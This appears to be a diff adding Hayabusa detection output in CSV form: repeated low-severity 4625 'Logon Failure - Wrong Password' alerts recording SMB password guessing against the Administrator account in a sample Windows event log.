+2016-09-20 01:50:22.431 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nvKcLrUXqu2vTKO3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PLycXLeAU21pdnXL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SgwjJSKOPnurDWW4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.564 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YPDYdxPoQAl8aGMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.594 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CX8knunlT6SMpmQw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.632 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AAjYbt50leZt3Xve | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3CD0HUCdg4UWOiji | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.709 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dkeWmTE1R1rYaYP8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.744 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W87qcfSj4qWWUv4k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.830 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WUCyUQgbUqwaLj3J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.877 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q9nLhDbcvmVBZp4f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.925 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BBWo1zDdjaAeGDWW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:22.960 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vjHRFk2flmzzd1zg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 53HYxs9s7fpP1y6V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.035 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tluqXKvVooP7VNyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.076 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 43m0nfi5tiv4TpSB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.107 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qjPyJXl984vViV6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.143 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MomQ8Yt51VsMiO4p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.175 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LJYCi5r2otMHxA8f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.211 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4oUSkMBI8SGDLwYC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.251 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j1x3lyRjxn73KITB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.283 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gh05BhGpwq1ho62a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.324 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bxj6ITbiciyRNLbF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.370 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uev2mjCaqHjm6NYi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.415 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L4WU383o9E5JyM5V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.450 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lfMv0lsoiRnTCFXe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XL4ahBqUyGeTONkE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8hJ888Kmyi6KqIPn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VZ6sfYMHuygnMdY2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.636 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XkuSlyTNc5OOoUtd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.676 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Z13YmupcMato8Sd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JedeMnLPnRJEwhZ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.810 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mmy0c0wFheIRzSo4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sskKdqku5S0f1sWm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:23.962 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 15Qg0nCXNj7Ub1Sj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZD6iuaqv70k69G87 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gk3UuqTJmvH1snmN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zaw9iF5mJlyygdnB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Sr5PZAd1qMc7hi3c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.167 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l5xbQtyueVq3fJSG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.203 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g2nP0zz2ofBxTGw6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SYJheREJmEwj0791 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: exglD9fnLwaqwRZn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.325 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8bSAU1QjasDAsmry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cfnrtXR7evQBbaOw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.410 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KYAwjW99chcntPsQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rG2PYfOTfT7QvbPu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FojDtfDNXq0gQfYu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SUTT0QycbFtyJfNL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gcbv1lrcYdT9Wuli | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.636 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pjdFfvCCfGXo7FUf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rzqGdWlGglLQx6Z4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3Rt80PMk70sVqbk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: okunzcEHnxUml4SG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qH0AY3DeIryuHSiN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.886 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DjqtxY5Fly4qAusS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PXHYu7wAqo7m6mZn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:24.990 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UaEM3boErBRrCbna | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.040 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7nSzwstH2imPjwah | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Z6NM0I4vRTXlLKu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jYhjN3f8KlFIEUKy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qWicYt2HXLDgc3kc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uz7yqqxdMrsM2L1g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wqKTguT2Z3OPCxGR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ywpwCM4u6nFSq9oS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.407 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k1t5ZBw3HOxux65e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.534 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MtLFQSltjjOjdl2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.593 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AyFD3cjef0NUMZZ5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uDYECnF1YTKRKA3K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.700 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pfqxcIVpX9BbsPIM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mjL5hvyYesMfDISw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3bh8c5ohv55SAX26 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MflfcFDnGU3xUOmz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:25.859 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aX0wfTs5FzCdwGrR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
